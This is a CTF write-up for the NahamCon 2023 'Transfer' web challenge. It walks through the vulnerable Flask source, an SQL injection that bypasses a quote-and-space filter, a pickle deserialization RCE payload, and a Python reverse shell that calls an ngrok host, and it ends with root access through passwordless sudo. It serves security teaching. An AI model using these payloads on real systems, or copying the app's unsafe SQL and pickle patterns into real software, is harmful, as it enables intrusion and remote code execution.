Nahamcon CTF 2023 - Web - Transfer
Difficulty: Hard
Points: 486
Challenge
I solved this challenge with my team Hacktback.
Solution
The challenge gives us the source code of app.py
from flask import Flask, request, render_template, redirect, url_for, flash, g, session, send_file
import io
import base64
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from functools import wraps
import sqlite3
import pickle
import os
import uuid
from werkzeug.utils import secure_filename
from datetime import datetime, timedelta
app = Flask(__name__)
app.secret_key = os.urandom(24)
DATABASE = '/tmp/database.db'
login_manager = LoginManager()
login_manager.init_app(app)
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'session_id' not in session:
return redirect(url_for('home', next=request.url))
return f(*args, **kwargs)
return decorated_function
class User(UserMixin):
pass
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
@login_manager.user_loader
def user_loader(username):
conn = get_db()
c = conn.cursor()
c.execute(f"SELECT * FROM users WHERE username='{username}'")
user_data = c.fetchone()
if user_data is None:
return
user = User()
user.id = user_data[0]
return user
@app.before_request
def before_request():
g.user = current_user
if g.user.is_authenticated:
conn = get_db()
c = conn.cursor()
c.execute(f"SELECT timestamp FROM activesessions WHERE username='{g.user.id}'")
timestamp = c.fetchone()[0]
if datetime.now() - datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S.%f") > timedelta(minutes=5):
flash('Your session has expired')
return logout()
else:
c.executescript(f"UPDATE activesessions SET timestamp='{datetime.now()}' WHERE username='{g.user.id}'")
conn.commit()
@app.route('/')
def home():
return render_template('login.html')
@app.route('/files')
@login_required
def files():
conn = get_db()
c = conn.cursor()
c.execute("SELECT filename FROM files")
file_list = c.fetchall()
return render_template('files.html', files=file_list)
def DBClean(string):
for bad_char in " '\"":
string = string.replace(bad_char,"")
return string.replace("\\", "'")
@app.route('/login', methods=['POST'])
def login_user():
username = DBClean(request.form['username'])
password = DBClean(request.form['password'])
conn = get_db()
c = conn.cursor()
sql = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
c.executescript(sql)
user = c.fetchone()
if user:
c.execute(f"SELECT sessionid FROM activesessions WHERE username=?", (username,))
active_session = c.fetchone()
if active_session:
session_id = active_session[0]
else:
c.execute(f"SELECT username FROM users WHERE username=?", (username,))
user_name = c.fetchone()
if user_name:
session_id = str(uuid.uuid4())
c.executescript(f"INSERT INTO activesessions (sessionid, timestamp) VALUES ('{session_id}', '{datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')}')")
else:
flash("A session could be not be created")
return logout()
session['username'] = username
session['session_id'] = session_id
conn.commit()
return redirect(url_for('files'))
else:
flash('Username or password is incorrect')
return redirect(url_for('home'))
@app.route('/logout', methods=['GET'])
def logout():
if 'session_id' in session:
conn = get_db()
c = conn.cursor()
c.executescript(f"DELETE FROM activesessions WHERE sessionid=" + session['session_id'])
conn.commit()
session.pop('username', None)
session.pop('session_id', None)
return redirect(url_for('home'))
@app.route('/download/<filename>/<sessionid>', methods=['GET'])
def download_file(filename, sessionid):
conn = get_db()
c = conn.cursor()
c.execute(f"SELECT * FROM activesessions WHERE sessionid=?", (sessionid,))
active_session = c.fetchone()
if active_session is None:
flash('No active session found')
return redirect(url_for('home'))
c.execute(f"SELECT data FROM files WHERE filename=?",(filename,))
file_data = c.fetchone()
if file_data is None:
flash('File not found')
return redirect(url_for('files'))
file_blob = pickle.loads(base64.b64decode(file_data[0]))
return send_file(io.BytesIO(file_blob), download_name=filename, as_attachment=True)
@app.route('/upload', methods=['POST'])
@login_required
def upload_file():
flash('Sorry, the administrator has temporarily disabled file upload capability.')
return redirect(url_for('files'))
def init_db():
with app.app_context():
db = get_db()
c = db.cursor()
c.execute("CREATE TABLE IF NOT EXISTS users (username text, password text)")
c.execute("CREATE TABLE IF NOT EXISTS activesessions (sessionid text, username text, timestamp text)")
c.execute("CREATE TABLE IF NOT EXISTS files (filename text PRIMARY KEY, data blob, sessionid text)")
c.execute("INSERT OR IGNORE INTO files VALUES ('flag.txt', ?, NULL)",
(base64.b64encode(pickle.dumps(b'lol just kidding this isnt really where the flag is')).decode('utf-8'),))
c.execute("INSERT OR IGNORE INTO files VALUES ('NahamCon-2024-Speakers.xlsx', ?, NULL)",
(base64.b64encode(pickle.dumps(b'lol gottem')).decode('utf-8'),))
db.commit()
if __name__ == '__main__':
with app.app_context():
init_db()
app.run(debug=False, host="0.0.0.0")
A quick look at this code reveals the first vulnerability we will exploit. The login form contains an SQL injection :
def login_user():
username = DBClean(request.form['username'])
password = DBClean(request.form['password'])
conn = get_db()
c = conn.cursor()
sql = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
c.executescript(sql)
user = c.fetchone()
But the username and password parameters are filtered. Let’s see how DBClean works:
def DBClean(string):
for bad_char in " '\"":
string = string.replace(bad_char,"")
return string.replace("\\", "'")
DBClean remove all single quote, double quotes and spaces from the username and the password and replace backslashes with single quotes. These filters are far from sufficient, and SQL injection can still be exploited using the following rules:
- Replace the single quotes by backslashes.
- /**/ comments behave in exactly the same way as spaces in SQL.
For example the payload username' or 1=1 --
become username\/**/or1=1/**/--
.
On the other hand, we notice an error in the source code. The executescript()
method, unlike execute()
, can execute several SQL queries but never returns anything. As a result, when you try to submit the connection form, fetchone()
will always return None, even if there is a user in the database. But executescript()
will allow us to execute multiple queries through SQL injection.
To find out which SQL injections we’re going to use, let’s take a look at the rest of the source code, and more specifically at this function:
@app.route('/download/<filename>/<sessionid>', methods=['GET'])
def download_file(filename, sessionid):
conn = get_db()
c = conn.cursor()
c.execute(f"SELECT * FROM activesessions WHERE sessionid=?", (sessionid,))
active_session = c.fetchone()
if active_session is None:
flash('No active session found')
return redirect(url_for('home'))
c.execute(f"SELECT data FROM files WHERE filename=?",(filename,))
file_data = c.fetchone()
if file_data is None:
flash('File not found')
return redirect(url_for('files'))
file_blob = pickle.loads(base64.b64decode(file_data[0]))
return send_file(io.BytesIO(file_blob), download_name=filename, as_attachment=True)
We can download a file without logging in, if you supply an existing id from the activesessions table. In addition, the file content is retrieved using the pickle module’s loads function, which is known to contain a serious RCE vulnerability (Remote Code Execution). Read more about this vulnerability on David Hamman’s blog.
Let’s try to create a payload exploiting the Pickle vulnerability. Encode it in base64 and use the SQL injection to add it to the File database.
import pickle
import base64
cmd = 'sleep 5'
class Exploit(object):
def __reduce__(self):
import os
return (os.system, (cmd,), )
print(base64.b64encode(pickle.dumps(Exploit())).decode("utf-8"))
# gASVIgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAdzbGVlcCA1lIWUUpQu
We start with a simple sleep command to avoid network troubles. Let’s build the SQL Injection request! We also add an id in the activesessions table.
username=Nalisco&password=password';INSERT INTO activesessions VALUES ('1234',null,null);INSERT INTO files VALUES('exploit','gASVIgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAdzbGVlcCA1lIWUUpQu',null)
username=Nalisco&password=password\;INSERT/**/INTO/**/activesessions/**/VALUES/**/(\1234\,null,null);INSERT/**/INTO/**/files/**/VALUES(\exploit\,\gASVIgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAdzbGVlcCA1lIWUUpQu\,null)
The download request lasted more than 5 seconds. The sleep command has been executed !
We have a remote code execution on the server. Let’s change our payload to a reverse shell:
import pickle
import base64
cmd = 'python3 -c "import socket,subprocess,os;s=socket.socket();s.connect((\'2.tcp.eu.ngrok.io\',16923));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\'/bin/sh\',\'-i\'])\"'
class Exploit(object):
def __reduce__(self):
import os
return (os.system, (cmd,), )
print(base64.b64encode(pickle.dumps(Exploit())).decode("utf-8"))
# gASV4AAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjMVweXRob24zIC1jICJpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgnMi50Y3AuZXUubmdyb2suaW8nLDE2OTIzKSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7c3VicHJvY2Vzcy5jYWxsKFsnL2Jpbi9zaCcsJy1pJ10pIpSFlFKULg==
Here i use ngrok to open my local port. Let’s repeat the above process.
We got a shell ! But it is not over, the flag is not on the transfer user home. Remember the challenge statement: We have to escalate our privileges. Let’s check the sudo permissions:
Easy ! We can use all sudo commands without password. We run sudo /bin/sh and we become root. The flag is in /root folder. Funny challenge !